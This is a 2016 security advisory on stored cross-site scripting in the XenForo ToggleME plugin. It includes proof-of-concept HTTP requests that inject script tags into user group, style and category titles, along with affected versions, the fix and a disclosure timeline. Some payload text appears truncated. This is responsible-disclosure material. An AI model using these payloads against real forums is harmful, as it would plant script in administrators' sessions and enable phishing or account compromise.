RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: XenForo ToggleME plugin Vendor URL: https://xenforo.com/community/resources/toggleme.137/ Type: Cross-Site Scripting [CWE-79] Date found: 2016-09-06 Date published: 2016-09-11 CVSSv3 Score: 5.5 (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N) CVE: - 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== ToggleME 3.1.2 older versions may be affected too. 4. INTRODUCTION =============== This addon will allow your users to collapse/expand some parts of your website: -forum categories -widgets -sidebar -sub-forums -postbit (*) -polls (*) (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== The script "/admin.php?options/list/toggleME" is vulnerable to multiple authenticated persistent Cross-Site Scripting vulnerabilities when user- supplied input is processed by the web application. Since the application does not properly validate and sanitize the user group title, the style title and the category title values, which can be configured in the XenForo backend, it is possible to place arbitrary script code permanently on the administrative interface of the plugin "Home > Options > ToggleME" ("/admin.php?options/list/toggleME"). User Group Title PoC -------------------- The following Proof-of-Concept triggers this vulnerability by changing the title of the existing user group "test" to ">: POST /admin.php?user-groups/test.9/save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/admin.php?user-groups/test.9/edit Cookie: xf_session_admin=06b0b5071e919de710599c78fccc8098; xf_session=d096696f90bd4b03d6430199458ab570; xf_edit_style_id=5 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 119 title=">&_xfToken=34486%2C1473325543%2Cd4c5dcb2ad2f2d5c42057fde1e5c0c3720f20179 The payload is then reflected multiple times on the "Home > Options > ToggleME" page, e.g.:
  • Style Title PoC --------------- The following Proof-of-Concept triggers this vulnerability by adding a new style with the title ">: POST /admin.php?styles/save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Ajax-Referer: http://localhost/admin.php?styles/add x-requested-with: XMLHttpRequest Referer: http://localhost/admin.php?styles/add Content-Length: 330 Cookie: xf_session_admin=06b0b5071e919de710599c78fccc8098; xf_session=d096696f90bd4b03d6430199458ab570; xf_edit_style_id=5 Connection: close parent_id=0&title=Test%3Cscript%3Ealert('styles-XSS')%3C%2Fscript%3E&description=&user_selectable=1&style_id=&_xfToken=34486%2C1473326249%2C9a56292449c786527b4faf2be04e1d50786120a2&_xfRequestUri=%2Fadmin.php%3Fstyles%2Fadd&_xfNoRedirect=1&_xfToken=34486%2C1473326249%2C9a56292449c786527b4faf2be04e1d50786120a2&_xfResponseType=json The payload is then reflected on the "Home > Options > ToggleME" page:
  • Category Title PoC ------------------ The following Proof-of-Concept triggers this vulnerability by adding a new category node with the title ">: POST /admin.php?categories/save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Ajax-Referer: http://localhost/admin.php?nodes/insert x-requested-with: XMLHttpRequest Referer: http://localhost/admin.php?nodes/insert Content-Length: 367 Cookie: xf_session_admin=06b0b5071e919de710599c78fccc8098; xf_session=d096696f90bd4b03d6430199458ab570; xf_edit_style_id=5 Connection: close title=Test%3Cscript%3Ealert('category-XSS')%3C%2Fscript%3E&description=&parent_node_id=0&display_order=1&display_in_list=1&node_type_id=Category&_xfToken=34486%2C1473326559%2C064f98b492af07e40d91b3e87c4b83838f260ad0&_xfRequestUri=%2Fadmin.php%3Fnodes%2Finsert&_xfNoRedirect=1&_xfToken=34486%2C1473326559%2C064f98b492af07e40d91b3e87c4b83838f260ad0&_xfResponseType=json The payload is then reflected multiple times on the "Home > Options > ToggleME" page like
  • 6. RISK ======= To successfully exploit these vulnerabilities, a user with rights to add or change user group titles, style titles or category titles must trick another authenticated user with access rights to the administrative panel of the plugin to visit the affected configuration page of the plugin. The vulnerabilities allow remote attackers to permanently embed arbitrary script code into the administrative context of the plugin configuration page within the XenForo administrative backend interface, which offers a wide range of possible attacks such as redirecting the user for phishing purporses or attacking the browser and its components of a user visiting the page. 7. SOLUTION =========== Update to ToggleME 3.1.4 8. REPORT TIMELINE ================== 2016-09-06: Discovery of the vulnerability 2016-09-07: Notified vendor via xenforo.com/community 2016-09-07: Vendor response to notification 2016-09-08: Full details sent to vendor 2016-09-08: Vendor releases ToggleMe 3.1.4 which fixes the issues 2016-09-11: Advisory released 9. REFERENCES ============= https://xenforo.com/community/resources/toggleme.137/update?update=20258 https://github.com/cclaerhout/xen_ToggleME/commit/3131d8042b6cf4d4f5e48b48337007c428dfa49e